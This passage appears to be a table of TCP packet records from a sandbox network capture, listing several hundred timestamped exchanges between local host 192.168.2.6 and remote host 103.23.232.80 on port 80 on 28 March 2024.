                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870467901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870501041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870518923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870552063 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870568037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870573044 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870594978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870609045 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870675087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870690107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870701075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870723963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870753050 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870971918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871020079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871071100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871151924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871192932 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871207952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871237993 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871263027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871288061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871311903 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871324062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871372938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871397972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871412992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871454954 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871459007 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871504068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871522903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871545076 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871572018 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871618986 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871634960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871661901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871692896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871712923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871737957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871787071 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871792078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871807098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871860027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871872902 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871901035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871938944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871946096 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.871965885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872004986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872011900 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872049093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872091055 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872128010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872148991 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872168064 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872169018 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872186899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872234106 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872263908 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872279882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872313023 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872327089 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872333050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872392893 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872410059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872437000 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872452974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872463942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872492075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872509003 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872533083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872570992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872612000 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872613907 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872627974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872697115 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872729063 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872741938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872769117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872772932 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872783899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872836113 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872869015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872886896 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872910976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872911930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872937918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872951031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.872991085 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873007059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873051882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873065948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873115063 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873119116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873140097 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873148918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873193979 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873238087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873240948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873285055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873296976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873312950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873337030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873354912 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873387098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873418093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873462915 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873492002 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873506069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873518944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873531103 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873532057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873574018 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873583078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873609066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873626947 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873631001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873676062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873691082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873717070 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873745918 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873749018 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873764992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873809099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873817921 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873823881 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873840094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873866081 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873887062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873902082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873914957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873927116 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873958111 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.873986006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874001980 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874013901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874027967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874041080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874046087 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874068975 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874083042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874085903 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874109030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874129057 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874135017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874154091 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874178886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874192953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874239922 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874248028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874263048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874275923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874284983 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874313116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874321938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874347925 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874361992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874387026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874407053 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874433041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874466896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874480963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874492884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874506950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874517918 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874520063 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874547005 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874553919 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874567986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874591112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874603033 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874631882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874639988 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874659061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874700069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874706984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874774933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874789000 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874802113 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874826908 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874855042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874857903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874875069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874887943 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874902010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874914885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874948025 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874948025 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.874963045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875024080 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875025988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875041008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875057936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875072956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875087023 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875099897 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875113010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875113964 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875152111 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875157118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875170946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875267982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875282049 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875293970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875307083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875308037 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875322104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875339031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875344992 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875351906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875364065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875375032 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875400066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875408888 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875441074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875456095 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875468969 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875490904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875514030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875520945 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875543118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875567913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875581980 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875588894 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875627995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875658989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875673056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875715971 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875720978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875741959 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875757933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875781059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875808001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875822067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875835896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875848055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875880003 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875904083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875916958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875931978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875946045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875971079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875974894 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.875997066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876002073 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876048088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876051903 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876065016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876079082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876091957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876106024 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876106977 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876132011 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876153946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876168013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876189947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876194954 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876207113 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876228094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876251936 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876255035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876276970 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876281023 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876308918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876346111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876351118 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876360893 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876374960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876383066 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876400948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876415968 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.876420021 CET4971880192.168.2.6103.23.232.80
